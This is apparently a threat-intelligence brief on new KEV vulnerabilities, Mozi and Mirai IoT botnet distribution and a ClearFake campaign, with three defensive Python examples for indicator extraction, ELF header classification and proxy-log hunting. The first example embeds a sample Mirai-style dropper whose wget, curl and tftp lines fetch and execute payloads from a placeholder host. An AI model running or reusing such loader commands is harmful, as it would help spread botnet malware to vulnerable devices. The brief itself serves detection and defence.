On April 28, 2026, threat intelligence collection identified two actively exploited vulnerabilities added to CISA's Known Exploited Vulnerabilities (KEV) catalog, alongside significant malware distribution activity. Microsoft Windows Shell contains a protection mechanism failure (CVE-2026-32202) that enables network-based spoofing attacks, and ConnectWise ScreenConnect servers that have not been updated remain exposed to the path traversal flaw CVE-2024-1708, which can lead to remote code execution. Organizations running either product should prioritize patching immediately.
Malware distribution activity remains elevated, with 51 malicious URLs identified across URLhaus feeds. The picture is one of continued botnet infrastructure growth, particularly Mozi and Mirai variants targeting IoT devices across multiple CPU architectures (MIPS, ARM, x86). A ClearFake campaign operating under four themed .garden parent domains (leafspring.garden, quartzprismcloud.garden, tundraflowunit.garden, basaltlogicnode.garden), all serving one shared URI path, shows deliberate, repeatable domain provisioning. Together, the multi-architecture payloads and the sustained botnet activity point to ongoing efforts to compromise vulnerable edge devices and build distributed attack infrastructure.
Two vulnerabilities added to CISA's Known Exploited Vulnerabilities catalog require immediate patching attention
Microsoft Windows Shell contains a protection mechanism failure vulnerability (CVE-2026-32202) that allows an unauthorized attacker to perform spoofing attacks over a network. It is a 2026 vulnerability, and its inclusion in the KEV catalog means CISA has evidence of exploitation in the wild; the corresponding Microsoft security update should be applied on the KEV due date or sooner.
ConnectWise ScreenConnect contains a path traversal vulnerability (CVE-2024-1708) that can enable remote code execution and unauthorized access to confidential data and critical systems. The flaw was disclosed in February 2024 and fixed in ScreenConnect 23.9.8 alongside the authentication bypass CVE-2024-1709, with which it was chained in the wild. Because ScreenConnect is remote support software, a compromised server is a ready foothold on every endpoint it manages, so on-premises instances still below the fixed version pose significant risk and should be updated and reviewed for signs of prior compromise.
Significant malware distribution activity detected with 51 malicious URLs, primarily targeting IoT devices with Mozi and Mirai botnet variants
Multiple distribution servers were observed hosting Mozi botnet payloads for MIPS and ARM, the architectures most common in compromised IoT devices. More than 20 distinct IP addresses served Mozi variants, indicating sustained expansion targeting routers, cameras, and other embedded systems.
One Mirai distribution server hosted payloads for eight build targets (MIPS, MIPSLE, ARM, ARM5, ARM6, ARM64, x86, AMD64) plus a Windows executable. The bins.sh loader script, which in this family typically changes to a writable directory and then fetches, marks executable and runs each architecture-specific binary in turn, together with the per-architecture builds, indicates a professionally maintained operation targeting diverse device types.
ClearFake payloads were served from 19 subdomains under four themed parent domains (leafspring.garden, quartzprismcloud.garden, tundraflowunit.garden, basaltlogicnode.garden). Every URL uses the same path (/cdk-msdn-3457325-null/load-file0dsdf567.chk), which makes the path itself a high-value detection pivot. The nature-themed names are consistent with bulk registration from a word list rather than a classic random-string DGA; whether they are generated algorithmically cannot be determined from naming alone, but the pattern does give the operators cheap, resilient infrastructure to rotate.
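The fastest way to turn a captured loader script into indicators is to parse it rather than read it by hand. The following is an added example, not code from the brief or from any project it describes: it parses a constructed Mirai-style bins.sh (the host 192.0.2.10 is a TEST-NET-1 address and the "mirai.<arch>" file names are illustrative, not the indicators from the feed), extracts every wget, curl and tftp fetch, de-duplicates repeated fetches, maps the file-name suffix to a CPU target, and summarises how many architectures each distribution host serves. The suffix table covers the common Mirai-family naming conventions and is an assumption about this operator's naming.

```python
from __future__ import annotations
import re
from urllib.parse import urlparse

# Constructed stand-in for a Mirai-style "bins.sh" dropper. The host 192.0.2.10
# (TEST-NET-1) and the "mirai.<arch>" file names are illustrative, not the
# indicators from the feed. The last line repeats a fetch to exercise de-duplication.
SAMPLE_BINS_SH = """#!/bin/sh
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://192.0.2.10/bins/mirai.mips; chmod +x mirai.mips; ./mirai.mips; rm -rf mirai.mips
wget http://192.0.2.10/bins/mirai.mpsl; chmod +x mirai.mpsl; ./mirai.mpsl; rm -rf mirai.mpsl
wget http://192.0.2.10/bins/mirai.arm; chmod +x mirai.arm; ./mirai.arm; rm -rf mirai.arm
wget http://192.0.2.10/bins/mirai.arm5; chmod +x mirai.arm5; ./mirai.arm5; rm -rf mirai.arm5
wget http://192.0.2.10/bins/mirai.arm6; chmod +x mirai.arm6; ./mirai.arm6; rm -rf mirai.arm6
wget http://192.0.2.10/bins/mirai.arm64; chmod +x mirai.arm64; ./mirai.arm64; rm -rf mirai.arm64
wget http://192.0.2.10/bins/mirai.x86; chmod +x mirai.x86; ./mirai.x86; rm -rf mirai.x86
curl -O http://192.0.2.10/bins/mirai.x86_64; chmod +x mirai.x86_64; ./mirai.x86_64; rm -rf mirai.x86_64
tftp -g -r mirai.ppc 192.0.2.10; chmod +x mirai.ppc; ./mirai.ppc; rm -rf mirai.ppc
tftp 192.0.2.10 -c get mirai.sh4; chmod +x mirai.sh4; ./mirai.sh4; rm -rf mirai.sh4
wget http://192.0.2.10/bins/mirai.x86; chmod +x mirai.x86; ./mirai.x86
"""

# File-name suffixes commonly used by Mirai-family build scripts, mapped to the CPU target
# (assumed naming convention; operators can and do pick arbitrary names).
ARCH_SUFFIXES = {
    "mips": "MIPS (big-endian)", "mpsl": "MIPS (little-endian)", "mipsel": "MIPS (little-endian)",
    "arm": "ARM", "arm5": "ARMv5", "arm6": "ARMv6", "arm7": "ARMv7",
    "arm64": "AArch64", "aarch64": "AArch64",
    "x86": "x86 (32-bit)", "i586": "x86 (32-bit)", "i686": "x86 (32-bit)",
    "x86_64": "x86-64", "amd64": "x86-64",
    "ppc": "PowerPC", "sh4": "SuperH", "m68k": "m68k", "spc": "SPARC",
}

HTTP_URL_RE = re.compile(r"https?://[^\s;'\"]+")
# BusyBox form: tftp -g -r FILE HOST ; classic form: tftp HOST -c get FILE
TFTP_GET_RE = re.compile(r"\btftp\s+(?:-g\s+)?-r\s+([^\s;]+)\s+([^\s;]+)")
TFTP_CGET_RE = re.compile(r"\btftp\s+([^\s;]+)\s+-c\s+get\s+([^\s;]+)")


def arch_of(filename: str) -> str:
    """Map a payload file name such as 'mirai.mpsl' to its CPU target, or 'unknown'."""
    suffix = filename.rsplit(".", 1)[-1].lower()
    return ARCH_SUFFIXES.get(suffix, "unknown")


def extract_payloads(script: str) -> list[dict]:
    """Return the unique (host, file) downloads a dropper performs, with transport and arch."""
    seen: dict[tuple[str, str], dict] = {}
    for line in script.splitlines():
        for url in HTTP_URL_RE.findall(line):
            parsed = urlparse(url)
            fname = parsed.path.rsplit("/", 1)[-1]
            seen.setdefault((parsed.hostname, fname), {
                "host": parsed.hostname, "file": fname, "transport": parsed.scheme,
                "url": url, "arch": arch_of(fname)})
        m = TFTP_GET_RE.search(line)
        if m:
            fname, host = m.group(1), m.group(2)
        else:
            m = TFTP_CGET_RE.search(line)
            if not m:
                continue
            host, fname = m.group(1), m.group(2)
        seen.setdefault((host, fname), {
            "host": host, "file": fname, "transport": "tftp",
            "url": f"tftp://{host}/{fname}", "arch": arch_of(fname)})
    return list(seen.values())


def coverage_by_host(script: str) -> dict[str, list[str]]:
    """Group the CPU targets each distribution host serves; a long list is the multi-arch signature."""
    out: dict[str, set[str]] = {}
    for p in extract_payloads(script):
        out.setdefault(p["host"], set()).add(p["arch"])
    return {host: sorted(archs) for host, archs in out.items()}


def indicators(script: str) -> list[str]:
    """Flat, sorted URL list suitable for a blocklist or a URLhaus lookup."""
    return sorted(p["url"] for p in extract_payloads(script))


if __name__ == "__main__":
    for host, archs in coverage_by_host(SAMPLE_BINS_SH).items():
        print(f"{host}: {len(archs)} targets -> {', '.join(archs)}")
    print("\n".join(indicators(SAMPLE_BINS_SH)))
```

The tftp handling is the part worth keeping: loaders that fall back to tftp on devices without wget produce no http:// string at all, so a URL-only regex silently under-counts the infrastructure.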
Analysis of observed malware distribution reveals sophisticated infrastructure management and multi-platform targeting strategies
Threat actors maintain synchronized payloads across eight build targets spanning MIPS (both endiannesses), several ARM ABIs and AArch64, and 32- and 64-bit x86. Covering this many targets maximizes recruitment across the heterogeneous IoT device landscape and indicates mature build and deployment tradecraft. When collecting these samples, confirm the target platform from each file's ELF header rather than from its file-name suffix, since the names are chosen by the operator and are not guaranteed to match.
The ClearFake campaign's domains pair nature words (leaf, quartz, tundra, basalt) with technical or abstract terms (spring, prism, cloud, flow, unit, logic, node). Whether produced by a dictionary-based DGA or registered in bulk by hand, themed names of this kind are cheap to mint and hard to predict, which gives the infrastructure resilience against takedowns and enables rapid domain rotation. Detections should therefore key on the shared URI path and on newly seen .garden parents rather than on the individual names.
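Judging architecture coverage from file names is only as reliable as the operator's naming. The block below is an added example, not code from the brief: it reads the ELF identification bytes and e_machine field from each payload's header, labels the platform (class, endianness, machine), recognises a PE stub for the Windows build, and cross-checks the header against the file-name suffix. The sample inventory is constructed from 64-byte header stubs carrying only the fields the parser reads (they are not real binaries), with one deliberately mislabelled file so the cross-check has something to catch.

```python
from __future__ import annotations
import struct

# ELF e_machine values for targets seen in IoT botnet builds (values from the ELF spec / elf.h).
EM_NAMES = {
    0x02: "SPARC", 0x03: "x86", 0x04: "m68k", 0x08: "MIPS", 0x14: "PowerPC",
    0x15: "PowerPC64", 0x28: "ARM", 0x2A: "SuperH", 0x3E: "x86-64", 0xB7: "AArch64",
}
ET_NAMES = {1: "relocatable", 2: "executable", 3: "shared object"}


def classify(data: bytes) -> dict:
    """Identify the target platform of a payload from its file header, not its name."""
    if data[:2] == b"MZ":
        return {"format": "PE", "note": "Windows executable"}
    if data[:4] != b"\x7fELF":
        return {"format": "unknown"}
    if len(data) < 20:
        return {"format": "ELF", "note": "truncated header"}
    ei_class, ei_data = data[4], data[5]          # EI_CLASS (1=32-bit, 2=64-bit), EI_DATA (1=LE, 2=BE)
    if ei_class not in (1, 2) or ei_data not in (1, 2):
        return {"format": "ELF", "note": "malformed e_ident"}
    order = "<" if ei_data == 1 else ">"
    e_type, e_machine = struct.unpack(order + "HH", data[16:20])   # same offsets for ELF32 and ELF64
    return {
        "format": "ELF",
        "bits": 32 if ei_class == 1 else 64,
        "endian": "little" if ei_data == 1 else "big",
        "machine": EM_NAMES.get(e_machine, f"unknown(0x{e_machine:02x})"),
        "type": ET_NAMES.get(e_type, f"unknown({e_type})"),
    }


def stub_elf(ei_class: int, ei_data: int, e_machine: int, e_type: int = 2) -> bytes:
    """Constructed 64-byte header stub (not a real sample) carrying only the fields classify() reads."""
    order = "<" if ei_data == 1 else ">"
    ident = b"\x7fELF" + bytes([ei_class, ei_data, 1, 0]) + b"\x00" * 8
    return ident + struct.pack(order + "HH", e_type, e_machine) + b"\x00" * 44


# Constructed inventory: (file name as served, header bytes). One entry is deliberately mislabelled.
SAMPLE_FILES = [
    ("mirai.mips", stub_elf(1, 2, 0x08)),
    ("mirai.mpsl", stub_elf(1, 1, 0x08)),
    ("mirai.arm7", stub_elf(1, 1, 0x28)),
    ("mirai.arm64", stub_elf(2, 1, 0xB7)),
    ("mirai.x86", stub_elf(1, 1, 0x03)),
    ("mirai.x86_64", stub_elf(2, 1, 0x3E)),
    ("mirai.ppc", stub_elf(1, 2, 0x14)),
    ("mirai.sh4", stub_elf(1, 1, 0x2A)),
    ("mirai.arm5", stub_elf(1, 1, 0x03)),          # mislabelled: ARM name, x86 header
    ("update.exe", b"MZ\x90\x00" + b"\x00" * 60),  # PE stub standing in for the Windows build
]


def platform_label(info: dict) -> str:
    if info["format"] == "PE":
        return "PE (Windows)"
    if info["format"] != "ELF" or "machine" not in info:
        return "unknown"
    return f"ELF{info['bits']} {info['machine']} {info['endian']}-endian"


def coverage(files) -> set[str]:
    """Distinct platforms actually present, judged by headers: the real multi-arch footprint."""
    return {platform_label(classify(data)) for _, data in files}


def mislabelled(files) -> list[str]:
    """File names whose suffix family disagrees with the header (cheap sanity check on feed metadata)."""
    family = {"mips": "MIPS", "mpsl": "MIPS", "arm": "ARM", "arm5": "ARM", "arm6": "ARM", "arm7": "ARM",
              "arm64": "AArch64", "x86": "x86", "x86_64": "x86-64", "ppc": "PowerPC", "sh4": "SuperH"}
    bad = []
    for name, data in files:
        expected = family.get(name.rsplit(".", 1)[-1].lower())
        if expected and classify(data).get("machine") != expected:
            bad.append(name)
    return bad


if __name__ == "__main__":
    for label in sorted(coverage(SAMPLE_FILES)):
        print(label)
    print("mislabelled:", mislabelled(SAMPLE_FILES))
```

Note that "mirai.mips" and "mirai.mpsl" share the same e_machine value (MIPS) and differ only in EI_DATA; endianness is what separates the two builds, so a classifier that ignores byte 5 of e_ident would merge them and under-count the footprint.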
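The shared URI path and the four .garden parents described above (and in the ClearFake summary earlier) translate directly into a detection. The following is an added example, not code from the brief: it runs a tiered match over constructed proxy log lines, grouping hits by parent domain so the count of distinct subdomains and affected clients falls out, and emits a Suricata rule for the exact path. The parent domains and the path are the ones the brief reports; the subdomain labels, client addresses, timestamps and the looser path regex (which tolerates a rotated numeric token and file name in case the operators vary them) are assumptions.

```python
from __future__ import annotations
import re
from collections import defaultdict
from typing import Optional

# Path reported in the brief. The looser pattern is an assumption: it tolerates a rotated
# numeric token and file name so a minor change by the operators does not blind the rule.
CLEARFAKE_PATH = "/cdk-msdn-3457325-null/load-file0dsdf567.chk"
CLEARFAKE_PATH_RE = re.compile(r"^/cdk-msdn-\d+-null/load-file[0-9a-z]+\.chk$")
# Parent domains reported in the brief; the subdomain labels in the sample log are constructed.
CLEARFAKE_PARENTS = {"leafspring.garden", "quartzprismcloud.garden",
                     "tundraflowunit.garden", "basaltlogicnode.garden"}

# Constructed proxy log lines: "<iso-timestamp> <client-ip> <method> <url> <status>".
SAMPLE_LOG = """\
2026-04-28T09:12:01Z 10.0.5.21 GET http://a1.leafspring.garden/cdk-msdn-3457325-null/load-file0dsdf567.chk 200
2026-04-28T09:12:03Z 10.0.5.21 GET http://updates.example.com/ping 200
2026-04-28T09:14:10Z 10.0.7.8 GET https://cdn9.quartzprismcloud.garden/cdk-msdn-3457325-null/load-file0dsdf567.chk 200
2026-04-28T09:15:42Z 10.0.7.8 GET https://cdn9.quartzprismcloud.garden/robots.txt 404
2026-04-28T09:20:00Z 10.0.9.3 GET http://x7.tundraflowunit.garden/cdk-msdn-9911001-null/load-file0aa11bb22.chk 200
2026-04-28T09:21:17Z 10.0.5.21 GET http://b2.leafspring.garden/cdk-msdn-3457325-null/load-file0dsdf567.chk 200
2026-04-28T09:25:55Z 10.0.1.1 GET http://shop.example.org/cdk-msdn-3457325-null/load-file0dsdf567.chk 200
"""

LOG_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\d{3})$")
URL_RE = re.compile(r"^https?://([^/]+)(/.*)?$")


def parse(line: str) -> Optional[dict]:
    m = LOG_RE.match(line)
    if not m:
        return None
    ts, client, method, url, status = m.groups()
    u = URL_RE.match(url)
    if not u:
        return None
    host = u.group(1).lower().split(":")[0]
    return {"ts": ts, "client": client, "method": method,
            "host": host, "path": u.group(2) or "/", "status": int(status)}


def parent_domain(host: str) -> str:
    """Registrable parent under the single-label .garden TLD: the last two labels."""
    return ".".join(host.split(".")[-2:])


def classify_event(ev: dict) -> Optional[str]:
    """high: known parent + exact path; medium: path variant anywhere (new parent or rotated token);
    low: known parent, unrelated path (still worth a look); None: no match."""
    known = parent_domain(ev["host"]) in CLEARFAKE_PARENTS
    if known and ev["path"] == CLEARFAKE_PATH:
        return "high"
    if CLEARFAKE_PATH_RE.match(ev["path"]):
        return "medium"
    if known:
        return "low"
    return None


def hunt(log: str) -> dict:
    """Run the detection over a log; return hits plus per-parent distinct subdomains and clients."""
    hits = []
    per_parent = defaultdict(lambda: {"subdomains": set(), "clients": set()})
    for line in log.splitlines():
        ev = parse(line)
        if ev is None:
            continue
        tier = classify_event(ev)
        if tier is None:
            continue
        ev["tier"] = tier
        hits.append(ev)
        parent = parent_domain(ev["host"])
        if tier in ("high", "medium") and parent in CLEARFAKE_PARENTS:
            per_parent[parent]["subdomains"].add(ev["host"])
            per_parent[parent]["clients"].add(ev["client"])
    summary = {p: {"subdomains": sorted(v["subdomains"]), "clients": sorted(v["clients"])}
               for p, v in per_parent.items()}
    return {"hits": hits, "per_parent": summary}


def suricata_rule(sid: int) -> str:
    """Exact-path HTTP rule for the reported URI; sid is the caller's choice."""
    return ('alert http any any -> any any (msg:"ClearFake .chk stage request"; '
            'flow:established,to_server; http.uri; content:"' + CLEARFAKE_PATH + '"; '
            f'classtype:trojan-activity; sid:{sid}; rev:1;)')


if __name__ == "__main__":
    result = hunt(SAMPLE_LOG)
    for h in result["hits"]:
        print(h["tier"], h["client"], h["host"] + h["path"])
    for parent, v in result["per_parent"].items():
        print(parent, len(v["subdomains"]), "subdomains,", len(v["clients"]), "clients")
    print(suricata_rule(1000001))
```

The medium tier is the interesting one operationally: the same path on shop.example.org is not one of the reported parents, but the brief's own observation that the path is uniform across all 19 subdomains makes a path-only hit a credible lead on a parent domain the feed has not seen yet.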